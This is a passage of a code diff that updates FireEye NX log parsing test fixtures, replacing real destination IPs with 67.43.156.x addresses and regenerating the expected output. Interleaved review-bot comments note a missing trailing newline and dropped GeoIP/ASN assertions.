+{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993227+0000\",\"flow_id\":1285126005631046,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":44535,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:22.763974+0000\",\"end\":\"2020-09-22T08:34:22.764073+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":522,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} 
-{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"213.227.168.146\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"202.28.116.236\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"162.159.246.125\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC 
CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"67.43.156.15\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} 
+{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"67.43.156.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 
1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:19.906154+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"548d03d3e11c009da833e6e59c4adfee\",\"stored\":false,\"size\":6394,\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":769,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"8.8.8.8\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} \ No newline at end of file 
+{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"67.43.156.15\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} \ No newline at end of file diff --git a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json index 3071515d2e5..90943f549f8 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json +++ b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json @@ -53,7 +53,7 @@ }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428504550Z", + "ingested": "2021-12-09T13:37:16.999899300Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.991339+0000\\\",\\\"flow_id\\\":721570461162990,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":45944,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:12.761326+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:12.761348+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"timeout\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":520,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, 
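Review bot: The final DNS record of test-nx.log is rewritten but the file still ends without a terminating newline (`\ No newline at end of file` survives on both sides of the hunk), so every future touch of this fixture will again produce a spurious diff on its last line; since the line is being changed anyway, ending it with `\n` is a cheap fix. A style point on the same hunk: the TLS record now has `dest_ip` 67.43.156.13 while its certificate subject, issuer and `sni` still describe Cloudflare and `cloud.fireeye.com`, which the parser will not care about but which makes the fixture less self-consistent; a sentence in the PR description that the public IPs are synthetic would help the next maintainer. The identical edits to the docker `sample_logs` copy of this file earlier in the diff keep the two fixtures in sync.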
@@ -72,29 +72,11 @@ } }, "destination": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "ID-YO", - "city_name": "Yogyakarta", - "country_iso_code": "ID", - "country_name": "Indonesia", - "region_name": "Yogyakarta", - "location": { - "lon": 110.3646, - "lat": -7.8035 - } - }, - "as": { - "number": 23951, - "organization": { - "name": "PT JEMBATAN CITRA NUSANTARA" - } - }, - "address": "202.65.114.202", + "address": "67.43.156.14", "port": 123, "bytes": 90, - "ip": "202.65.114.202", - "packets": 1 + "packets": 1, + "ip": "67.43.156.14" }, "source": { "address": "192.168.1.15", @@ -108,7 +90,7 @@ ], "network": { "protocol": "failed", - "community_id": "1:dwbu/vcPXLC0ZAVlALqs0a1e77Y=", + "community_id": "1:RXq9OIqNb6ISMqP+R+uVnsOCMAc=", "transport": "udp", "iana_number": 17 }, 
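Review bot: In this hunk the regenerated expectation drops `destination.geo` and `destination.as` for the new address instead of carrying updated values, so the fixture no longer asserts that the pipeline's GeoIP/ASN enrichment runs on `destination.ip`; a regression that silently skipped those processors would now pass this test. If 67.43.156.0/24 is meant to resolve in the test GeoIP database used by the pipeline tests, the missing fields suggest the expected file was regenerated without it and should be regenerated again; if the range is intentionally unresolvable, consider leaving at least one event on an address the test database covers so the enrichment path stays tested. The same loss repeats in the later `destination` hunks of this file.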
@@ -123,13 +105,13 @@ "related": { "ip": [ "192.168.1.15", - "202.65.114.202" + "67.43.156.14" ] }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428536520Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"202.65.114.202\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999903100Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { 
@@ -185,7 +167,7 @@ }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428544645Z", + "ingested": "2021-12-09T13:37:16.999909200Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993227+0000\\\",\\\"flow_id\\\":1285126005631046,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":44535,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:22.763974+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:22.764073+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":522,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, @@ -213,29 +195,11 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", - "location": { - "lon": 8.6843, - "lat": 50.1188 - } - }, - "as": { - "number": 42473, - "organization": { - "name": "ANEXIA Internetdienstleistungs GmbH" - } - }, - "address": "213.227.168.146", + "address": "67.43.156.15", "port": 5938, "bytes": 59808, - "ip": "213.227.168.146", - "packets": 544 + "packets": 544, + "ip": "67.43.156.15" }, "source": { "address": "192.168.1.150", @@ -249,7 +213,7 @@ ], "network": { "protocol": "failed", - "community_id": "1:+/xj+eTk/ch6VeYkwqFLSEFasbQ=", + "community_id": "1:45/AGSM9JqMdS9WIK3bAZqim3A4=", "transport": "tcp", "iana_number": 6 }, 
@@ -264,13 +228,13 @@ "related": { "ip": [ "192.168.1.150", - "213.227.168.146" + "67.43.156.15" ] }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428551238Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"213.227.168.146\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999915900Z", + "original": 
"{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { @@ -288,29 +252,11 @@ } }, "destination": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "TH-40", - "city_name": "Ban Kho", - "country_iso_code": "TH", - "country_name": "Thailand", - "region_name": "Khon Kaen", - "location": { - "lon": 102.6842, - "lat": 16.4007 - } - }, - "as": { - "number": 9546, - "organization": { - "name": "Ministry of University Affairs" - } - }, - "address": "202.28.116.236", + "address": "67.43.156.14", "port": 123, "bytes": 90, - "ip": "202.28.116.236", - "packets": 1 + "packets": 1, + "ip": "67.43.156.14" }, "source": { "address": "192.168.1.15", @@ -324,7 +270,7 @@ ], "network": { "protocol": "failed", - "community_id": "1:Ahqgaqtz5y0V0twJYxhsEC4oe5Q=", + "community_id": "1:lPFhChZNfHDZ1i2YD0w8DBTTAf0=", "transport": "udp", "iana_number": 17 }, 
@@ -339,13 +285,13 @@ "related": { "ip": [ "192.168.1.15", - "202.28.116.236" + "67.43.156.14" ] }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428557209Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"202.28.116.236\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999921200Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { 
@@ -355,15 +301,9 @@ } }, "destination": { - "as": { - "number": 13335, - "organization": { - "name": "Cloudflare, Inc." - } - }, - "address": "162.159.246.125", "port": 443, - "ip": "162.159.246.125" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "port": 53918, @@ -377,7 +317,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:hohAqFfok7/ZazgOLxyINJAOFsc=", + "community_id": "1:YekG1DgBPSO2IV15xvK9ncRxx8c=", "iana_number": 6, "transport": "tcp" }, @@ -392,7 +332,7 @@ "related": { "ip": [ "192.168.1.99", - "162.159.246.125" + "67.43.156.13" ] }, "tls": { 
@@ -457,8 +397,8 @@ }, "event": { "type": "tls", - "ingested": "2021-10-27T09:47:09.428563050Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:01.175635+0000\\\",\\\"flow_id\\\":1136872856843530,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"tls\\\",\\\"src_ip\\\":\\\"192.168.1.99\\\",\\\"src_port\\\":53918,\\\"dest_ip\\\":\\\"162.159.246.125\\\",\\\"dest_port\\\":443,\\\"proto\\\":\\\"TCP\\\",\\\"tls\\\":{\\\"subject\\\":\\\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\\\",\\\"issuerdn\\\":\\\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\\\",\\\"ja3\\\":{\\\"hash\\\":\\\"21536525fbf9e289f79e0f98af64bb59\\\",\\\"string\\\":\\\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\\\"},\\\"ja3s\\\":{\\\"hash\\\":\\\"9873b112313d7c4e5e8ef6207e6c6f0d\\\",\\\"string\\\":\\\"771,49195,0-65281-11-13172\\\"},\\\"fingerprint\\\":\\\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\\\",\\\"sni\\\":\\\"cloud.fireeye.com\\\",\\\"version\\\":\\\"TLS 1.2\\\",\\\"notbefore\\\":\\\"2020-07-01T00:00:00.000000+0000\\\",\\\"notafter\\\":\\\"2021-07-01T12:00:00.000000+0000\\\",\\\"client_ciphersuites\\\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\\\"client_tls_exts\\\":[0,11,10,13,15,13172],\\\"server_ciphersuite\\\":49195,\\\"server_tls_exts\\\":[0,65281,11,13172],\\\"pubkeylength\\\":65}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":1146,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999927600Z", + "original": 
"{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:01.175635+0000\\\",\\\"flow_id\\\":1136872856843530,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"tls\\\",\\\"src_ip\\\":\\\"192.168.1.99\\\",\\\"src_port\\\":53918,\\\"dest_ip\\\":\\\"67.43.156.13\\\",\\\"dest_port\\\":443,\\\"proto\\\":\\\"TCP\\\",\\\"tls\\\":{\\\"subject\\\":\\\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\\\",\\\"issuerdn\\\":\\\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\\\",\\\"ja3\\\":{\\\"hash\\\":\\\"21536525fbf9e289f79e0f98af64bb59\\\",\\\"string\\\":\\\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\\\"},\\\"ja3s\\\":{\\\"hash\\\":\\\"9873b112313d7c4e5e8ef6207e6c6f0d\\\",\\\"string\\\":\\\"771,49195,0-65281-11-13172\\\"},\\\"fingerprint\\\":\\\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\\\",\\\"sni\\\":\\\"cloud.fireeye.com\\\",\\\"version\\\":\\\"TLS 